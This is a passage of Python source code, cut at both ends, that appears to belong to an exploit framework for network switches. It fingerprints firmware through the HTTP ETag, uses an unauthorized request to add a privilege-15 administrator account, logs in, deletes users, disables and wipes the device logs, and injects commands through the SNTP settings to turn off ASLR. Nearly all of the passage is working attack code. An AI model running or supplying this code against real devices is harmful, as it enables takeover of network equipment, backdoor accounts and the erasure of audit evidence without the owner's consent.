int(len(self.target['verify'][check]['content'])):\r\n\t\t\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(response[content+1]))\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\r\n\t\t\t\telif self.target['verify'][check]['response'] == 'file':\r\n\t\t\t\t\tif self.target['verify'][check]['check_uri']:\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\ttime.sleep(1) # Some checks needs to have some time\r\n\t\t\t\t\t\t\tURI = self.target['verify'][check]['check_uri']\r\n\t\t\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\t\t\tif response == self.target['verify'][check]['content_check']:\r\n\t\t\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(response))\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\t\tcgi.failure(str(e))\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcgi.failure(\"Not vulnerable\")\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\tcgi.failure(\"Not vulnerable\")\r\n\t\t\t\tif not self.check_all:\r\n\t\t\t\t\treturn False\r\n\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\t\tif e.code == 502:\r\n\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(e))\r\n\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tcgi.failure(str(e))\r\n\t\t\t\t\treturn False\r\n\r\n\t\treturn True\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef check_remote(self,etag):\r\n\t\tself.manualETag = etag\r\n\r\n\t\tremote = log.progress(\"Target\")\r\n\r\n\t\tif self.manualETag:\r\n\t\t\tif self.manualETag == 'help':\r\n\t\t\t\tprint \"\"\r\n\t\t\t\tremote.success(\"List of known targets\")\r\n\t\t\telif self.manualETag == 'info':\r\n\t\t\t\tprint \"\"\r\n\t\t\t\tremote.success(\"Brief information of known targets\")\r\n\r\n\t\t\ttarget = Vendor(self.manualETag).dict()\r\n\t\t\tif target:\r\n\t\t\t\tremote.success(\"{} ({} v{})\".format(target['vendor'],target['model'],target['version']))\r\n\t\t\t\treturn target\r\n\t\t\telse:\r\n\t\t\t\tremote.failure(\"Unknown ({})\".format(self.manualETag))\r\n\t\t\t\treturn False\r\n\r\n\t\tremote.status(\"Checking\")\r\n\t\tURI = '/'\r\n\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded\r\n\t\tresult = response.read().split()\r\n\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t#\r\n\t\t# Use HTTP ETag to identify remote vendor and FW version, to choose right code/gadgets\r\n\t\t#\r\n\t\tself.ETag = response.info().get('ETag').replace('\"','')\r\n\t\tDEBUG(\"RECV\",response.info())\r\n\r\n\t\ttarget = Vendor(self.ETag).dict()\r\n\t\tif not target:\r\n\t\t\tremote.failure(\"Unknown ({})\".format(self.ETag))\r\n\t\t\treturn False\r\n\r\n\t\tif target:\r\n\t\t\tremote.success(\"{} ({} v{})\".format(target['vendor'],target['model'],target['version']))\r\n\t\t\tif target['info_leak']:\r\n\t\t\t\tinfo_leak = log.progress(\"Model\")\r\n\t\t\t\tURI = target['info_leak_uri']\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded\r\n\t\t\t\tresponse = response.read()\r\n\r\n\t\t\t\tif target['info_leak_JSON']:\r\n\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\t\t\t\t\ttmp = result.get('data')\r\n\t\t\t\t\tif tmp.get('description'):\r\n\t\t\t\t\t\tinfo_leak.success(result['data']['description'])\r\n\t\t\t\t\telif tmp.get('productName'):\r\n\t\t\t\t\t\tinfo_leak.success(result['data']['productName'])\r\n\t\t\t\t\telif tmp.get('title'):\r\n\t\t\t\t\t\tinfo_leak.success(result['data']['title'])\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tinfo_leak.failure(\"Failed\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tresponse = re.split('[()<>\\n:,.;=\" ]',response)\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\t\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\t\tif response[check] == 'modelName':\r\n\t\t\t\t\t\t\tinfo_leak.success(response[check+2])\r\n\t\t\t\t\t\t\treturn target\r\n\t\t\t\t\tinfo_leak.failure(\"Not found\")\r\n\t\t\t\t\tprint response\r\n\r\n\t\t\treturn target\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef add_user(self,target):\r\n\t\tself.target = target\r\n\r\n\t\tadd = log.progress(\"Adding credentials\")\r\n\r\n\t\tif not self.target['exploit']['priv15_account']['vulnerable']:\r\n\t\t\tadd.failure(\"Not listed as vulnerable\")\r\n\t\t\tif self.target['exploit']['stack_cgi_add_account']['vulnerable']:\r\n\t\t\t\treturn self.stack_add_account(self.target)\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\r\n\t\tUSERNAME = self.credentials.split(':')[0]\r\n\r\n\t\tif USERNAME == 'admin' or USERNAME == 'cisco':\r\n\t\t\tlog.failure(\"[bad boy] Username '{}' shall not be changed!\".format(USERNAME))\r\n\t\t\treturn False\r\n\r\n\t\tif target['exploit']['priv15_account']['encryption'] == 'md5':\r\n\t\t\tPASSWORD = self.md5hash(self.credentials.split(':')[1], base64encode=True)\r\n\t\telif target['exploit']['priv15_account']['encryption'] == 'clear':\r\n\t\t\tPASSWORD = self.credentials.split(':')[1]\r\n\t\telif target['exploit']['priv15_account']['encryption'] == 'nopassword':\r\n\t\t\tPASSWORD = 'nopassword' # dummy\r\n\t\telse:\r\n\t\t\tlog.failure(\"No password type\")\r\n\t\t\treturn False\r\n\r\n\t\tquery_args = self.target['exploit']['priv15_account']['content']\r\n\t\tquery_args = query_args.replace('USERNAME',USERNAME)\r\n\t\tquery_args = query_args.replace('PASSWORD',PASSWORD)\r\n\r\n\t\tlog.info(\"Credentials: {}/{}\".format(USERNAME,PASSWORD))\r\n\r\n\t\ttry:\r\n\t\t\tadd.status(\"Trying...\")\r\n\t\t\tURI = target['exploit']['priv15_account']['add_uri']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read().split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'init(){fileLoadWait();' or response[check] == 'id=\"reason\">Merging' or response[check] == '(tmpStr.indexOf(\"FlashWriteDone\")':\r\n\t\t\t\t\tadd.success(\"Success\")\r\n\t\t\t\t\ttime.sleep(5) # Wait a bit so the account will be merged\r\n\t\t\t\t\treturn True\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tadd.failure(\"error {}\".format(e))\r\n\t\t\treturn False\r\n\r\n\t\tadd.failure(\"Failed\")\r\n\t\tprint response\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef del_user(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif not self.target['exploit']['priv15_account']['vulnerable']:\r\n\t\t\tremove.failure(\"Not listed as vulnerable\")\r\n\t\t\tif self.target['exploit']['stack_cgi_del_account']['vulnerable']:\r\n\t\t\t\treturn self.stack_del_account(self.target)\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\r\n\t\tUSERNAME = self.credentials.split(':')[0]\r\n\t\tremove = log.progress(\"Remove credentials for {}\".format(USERNAME))\r\n\r\n\t\tif USERNAME == 'admin' or USERNAME == 'cisco':\r\n\t\t\tremove.failure(\"[bad boy] Username '{}' shall not be deleted!\".format(USERNAME))\r\n\t\t\treturn False\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\ttry:\r\n\t\t\tremove.status(\"Trying...\")\r\n\r\n\t\t\tURI = target['exploit']['priv15_account']['del_uri']\r\n\r\n\t\t\tif len(self.target['exploit']['priv15_account']['del_query']) >= 1:\r\n\t\t\t\tquery_args = self.target['exploit']['priv15_account']['del_query']\r\n\t\t\t\tquery_args = query_args.replace('USERNAME',USERNAME)\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tresult = response\r\n\t\t\telse:\r\n\t\t\t\tURI = URI.replace('USERNAME',USERNAME)\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\tresult = response\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tif not self.target['exploit']['priv15_account']['json']:\r\n\t\t\t\tif result.code == 200 and len(response) == 0:\r\n\t\t\t\t\tremove.success(\"Success\")\r\n\t\t\t\t\treturn True\r\n\r\n\t\t\t\tresponse = response.split(\"'\")\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == ': The user is not exist!!<br>' or response[check] == 'Error String':\r\n\t\t\t\t\t\tremove.failure(\"User do not exist\")\r\n\t\t\t\t\t\tself.logout(self.target)\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\tremove.failure(\"Failed\")\r\n\t\t\t\tself.logout(self.target)\r\n\t\t\t\treturn False\r\n\t\t\telse:\r\n\t\t\t\tresult = json.loads(response.read())\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\tremove.success(\"Success\")\r\n\t\t\t\t\treturn True\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlog.info(\"error {}\".format(e))\r\n\t\t\treturn False\r\n\r\n\t\tremove.failure(\"Failed\")\r\n\t\tprint result\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef logout(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tlogout = log.progress(\"Logging out\")\r\n\r\n\t\tif not self.target['login']['vulnerable']:\r\n\t\t\tlogout.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tlogout.status(\"Trying...\")\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\tURI = self.target['login']['logout_uri']\r\n\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['login']['json']:\r\n\t\t\tresponse = response.split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'function goback(){' or response[check] == 'onload=\"goback();\">': \r\n\t\t\t\t\tlogout.success(\"Success\")\r\n\t\t\t\t\treturn True\r\n\r\n\t\t\tlogout.failure(\"Failed\")\r\n\t\t\treturn False\r\n\r\n\t\telse:\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'success' or result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tlogout.success(\"Success\")\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlogout.failure(\"Failed\")\r\n\t\t\t\tprint result\r\n\t\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef login(self,target):\r\n\t\tself.target = target\r\n\r\n\t\tlogin = log.progress(\"Login\")\r\n\r\n\t\tif not self.target['login']['vulnerable']:\r\n\t\t\tlogin.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\t#\r\n\t\t# login\r\n\t\t#\r\n\t\ttry:\r\n\t\t\tUSERNAME = self.credentials.split(':')[0]\r\n\r\n\t\t\tif self.target['login']['encryption'] == 'rsa':\r\n\t\t\t\tPASSWORD = self.RSA_Password(self.credentials.split(':')[1])\r\n\t\t\telif self.target['login']['encryption'] == 'caesar':\r\n\t\t\t\tPASSWORD = self.caesar_encode(self.credentials.split(':')[1])\r\n\t\t\telif self.target['login']['encryption'] == 'encode':\r\n\t\t\t\tPASSWORD = self.obfuscation_encode(self.credentials.split(':')[1])\r\n\t\t\telif self.target['login']['encryption'] == 'clear':\r\n\t\t\t\tPASSWORD = self.credentials.split(':')[1]\r\n\t\t\telse:\r\n\t\t\t\tlogin.failure(\"No login password matching\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tquery_args = self.target['login']['query']\r\n\t\t\tquery_args = query_args.replace('USERNAME',USERNAME)\r\n\t\t\tquery_args = query_args.replace('PASSWORD',PASSWORD)\r\n\r\n\t\t\tURI = self.target['login']['login_uri']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tif not self.target['login']['json']:\r\n\t\t\t\tresponse = response.split()\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == 'top.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=1\")' or response[check] == 'href=\"/cgi-bin/dispatcher.cgi?cmd=5890':\r\n\t\t\t\t\t\tlogin.success(\"Success\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telif response[check] == 'window.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=3\");':\r\n\t\t\t\t\t\tlogin.success(\"Already logged in\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telif response[check] == 'top.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=5\")':\r\n\t\t\t\t\t\tlogin.failure(\"Failed\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif len(response) == check + 1:\r\n\t\t\t\t\t\tlogin.failure(\"Not supported device\")\r\n\t\t\t\t\t\tprint response\r\n\t\t\t\t\t\treturn False\r\n\t\t\telse:\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success' or result['status'] == 'ok' and result['msgType'] == 'success':\r\n\t\t\t\t\tlogin.status(\"Verifying\")\r\n\t\t\t\t\tURI = self.target['login']['status_uri']\r\n\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\tif result['data']['status'] == 'ok':\r\n\t\t\t\t\t\tlogin.success(\"Success\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telif result['data']['status'] == 'authing':\r\n\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\t# try one more time\r\n\t\t\t\t\t\tURI = self.target['login']['status_uri']\r\n\t\t\t\t\t\tlogin.status(\"One more time...\")\r\n\t\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\t\tif result['data']['status'] == 'ok':\r\n\t\t\t\t\t\t\tlogin.success(\"Success\")\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlogin.failure(\"Failed (Authing)\")\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif result['data']['status'] == 'fail':\r\n\t\t\t\t\t\tlogin.failure(\"Failed {}\".format(result['data']['failReason']))\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\r\n\t\t\tlogin.failure(\"error {}\".format(e))\r\n\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef disable_clean_log(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tclear_log = log.progress(\"Logging disable & clean\")\r\n\r\n\t\tif not self.target['log']['vulnerable']:\r\n\t\t\tclear_log.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\ttry:\r\n\t\t\tclear_log.status(\"Trying to disable\")\r\n\r\n\t\t\tURI = self.target['log']['disable_uri']\r\n\t\t\tquery_args = self.target['log']['disable_query']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tURI = self.target['log']['status']\r\n\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tif not self.target['log']['json']:\r\n\t\t\t\tresponse = re.split(\"[<>\\n]\",response)\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == 'window.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=5120\");':\r\n\t\t\t\t\t\tclear_log.status(\"Disabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\telse: # json\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['data']['logState'] == False:\r\n\t\t\t\t\tclear_log.status(\"Disabled\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tclear_log.failure(\"Logging still enabled\")\r\n\t\t\t\t\treturn False\r\n\r\n\t\t\tclear_log.status(\"Trying to clean\")\r\n\r\n\t\t\tURI = self.target['log']['clean_logfile_uri']\r\n\t\t\tquery_args = self.target['log']['clean_logfile_query']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tif not self.target['log']['json']:\r\n\t\t\t\tresponse = re.split(\"[<>'\\n]\",response)\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':\r\n\t\t\t\t\t\tclear_log.status(\"Disabled\")\r\n\t\t\t\t\t\tURI = self.target['log']['clean_logmem_uri']\r\n\t\t\t\t\t\tquery_args = self.target['log']['clean_logmem_query']\r\n\t\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\t\tresponse = re.split(\"[<>'\\n]\",response)\r\n\t\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':\r\n\t\t\t\t\t\t\t\tclear_log.success(\"Success\")\r\n\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tclear_log.failure(\"Failed\")\r\n\t\t\t\treturn False\r\n\t\t\telse: # json\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\tURI = self.target['log']['clean_logmem_uri']\r\n\t\t\t\t\tquery_args = self.target['log']['clean_logmem_query']\r\n\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\t\tclear_log.success(\"Success\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tclear_log.failure(\"Failed\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tclear_log.failure(\"Failed\")\r\n\t\t\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlog.info(\"error {}\".format(e))\r\n\t\t\treturn False\r\n\r\n\t\tclear_log.failure(\"LOG Failed\")\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef SNTP(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tSNTP = log.progress(\"SNTP\")\r\n\r\n\t\tif not self.target['exploit']['sntp']['vulnerable']:\r\n\t\t\tSNTP.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tSNTP.status(\"Trying...\")\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\tSNTP.status(\"Enable SNTP\")\r\n\r\n\t\tURI = self.target['exploit']['sntp']['enable_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['enable_query']\r\n\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = re.split(\"[<>\\n]\",response)\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'SNTP':\r\n\t\t\t\t\tif response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\t\telif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Disabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tSNTP.failure(\"Enable SNTP Failed\")\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tURI = self.target['exploit']['sntp']['status_uri']\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tresponse = self.clean_json(response)\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tfor status in result['data']:\r\n\t\t\t\t\tif status == 'sntp' and result['data']['sntp'] == True:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telif status == 'sntp' and result['data']['sntp'] == False:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Disabled\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == True:\r\n\t\t\t\t\t\tSNTP.status(\"SNTP Enabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telif status == 'sntpStatus' and result['data']['sntpStatus'] == False:\r\n\t\t\t\t\t\tSNTP.failure(\"SNTP Disabled\")\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\t\telse:\r\n\t\t\t\tSNTP.failure(\"Enable SNTP Failed\")\r\n\t\t\t\treturn False\r\n\r\n\t\tURI = self.target['exploit']['sntp']['inject_uri']\r\n\t\tquery_args = self.target['exploit']['sntp']['inject_query']\r\n\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['exploit']['sntp']['json']:\r\n\t\t\tresponse = response.split('\"')\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':\r\n\t\t\t\t\tquery_args = self.target['exploit']['sntp']['check_query']\r\n\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\tresponse = response.split('\"')\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':\r\n\t\t\t\t\t\t\tURI = self.target['exploit']['sntp']['verify_uri']\r\n\t\t\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\t\t\tresponse = response.read().split()\r\n\t\t\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\t\t\tif response[0] == '0':\r\n\t\t\t\t\t\t\t\tSNTP.status(\"ASLR disabled\")\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tSNTP.failure(\"Check Failed\")\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\tbreak\r\n\r\n\r\n\t\telse: # json\r\n\t\t\tresponse = self.clean_json(response)\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tquery_args = self.target['exploit']['sntp']['check_query']\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tresponse = self.clean_json(response)\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\tURI = 